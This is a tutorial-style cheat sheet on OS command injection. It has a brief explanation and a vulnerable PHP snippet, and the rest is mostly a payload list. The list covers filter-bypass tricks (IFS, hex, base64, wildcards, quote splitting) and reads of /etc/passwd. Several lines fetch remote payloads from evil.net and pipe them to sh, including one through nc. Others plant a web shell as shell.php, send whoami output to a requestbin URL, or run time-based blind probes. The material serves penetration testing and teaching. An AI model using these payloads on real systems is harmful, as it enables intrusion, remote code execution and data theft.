Command Injection
Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. The danger of command injection is that it can allow an attacker to execute any command on the system, potentially leading to full system compromise.
Example of vulnerable PHP code
<?php
system('ping -c 2 '. $_GET['ip']);
?>
The PHP script uses the system function to execute the ping command with the IP address provided by the user through the GET method parameter ip.
Before learning about command injection attack, we need to understand the following characters or command syntaxes.
Command syntaxes && Characters
;(Semicolon) : We can use this character to run two or more commands in a single line.
whoami; pwd # it will execute whoami command then pwd command
&(Ampersand) : The first command will be run in the background, and then the second command will be run at the same time.
date & date # you will get the same output for both commands
&&(Double Ampersand) : If the first command return true,the second command will be execute.
command -v sqlmap && sqlmap -u target.com/vuln.php?id=7
|(Pipe) : To share output of the first command with the second command.
cat /etc/passwd | grep -iw root
||(Double Pipe) : To execute a second command only if the first command fails or return false.
systemctl || service
Expansions (Command substitution)
`(Backtick) : We can use backtick for command substitution
echo "You are currently logged in as `whoami`."
$()(Syntax) : We can use this syntax for command substitution
echo "Today date is $(date)."
URL encoding
We can use %0A or %0D to perform command injection. These two values are the same as \n, representing a new line (ENTER).
targetwebapp.com/vulnerable.php?ip=127.0.0.1%0Awhoami
targetwebapp.com/vulnerable.php?ip=127.0.0.1%0Dwhoami
Byass payloads
Bypass without spaces
cat${IFS}/etc/passwd
{cat,/etc/passwd}
Bypass / (slash)
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat ${PWD:0:1}etc${PWD:0:1}passwd
Bypass blacklisted words
Bywith using quotes
who'am'i
"who"ami
Bypas using backtick
wh``oa``mi
Bypassing with empty variables
wh$9oa$9mi # We can use any number 0-9
who$@ami
wh${i}oa${i}mi
Bypass using command substitution
w`echo ho`ami
w$(echo ho)ami
Bypassing with HEX encoding
echo -e '\x77\x68\x6f\x61\x6d\x69'|sh
`echo -e '\x77\x68\x6f\x61\x6d\x69'`
$(echo -e '\x77\x68\x6f\x61\x6d\x69')
cat `echo -e '\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
How to generate hex values?
sudo apt install xxd -y
echo -n "/etc/passwd" | xxd -p -c 256 | sed 's/../\\x&/g'
Bypass using base64 encoding
`base64 -d <<<d2hvYW1pCg==`
$(base64 -d <<<d2hvYW1pCg==)
base64 -d <<<d2hvYW1pCg== |sh
Payload in the payload
If filter is removing some blacklisted keywords, we can use payload in the payload method.
If filter removes whoami
whowhoamiami
If filter removes rm
rrmm
Bypass with wildcards
cat /et*/passw*
cat /et?/pas??d
Bypass using curl
curl evil.net/payload.txt|sh
sh -c "`curl evil.net/payload.txt`"
sh -c "$(curl evil.net/payload.txt)"
If curl command not found
echo -e "GET /payload.txt HTTP/1.1\r\nHost: evil.net\r\nConnection: close\r\n\r\n" | nc evil.net 80 |sh
Blind command injection
Redirections
Truncate
curl evil.net/shell.txt >shell.php
Append
curl evil.net/shell.txt >>shell.php
Using curl -o flag
curl evil.net/shell.txt -o shell.php
Using requestbin
curl "https://********.m.pipedream.net/?data=`whoami`"
curl -A "$(whoami)" "https://********.m.pipedream.net/"
Replace with your request bin URL.
Time based injection
if [ $(whoami|cut -c 1) == c ]; then sleep 5; fi
Try possible characters.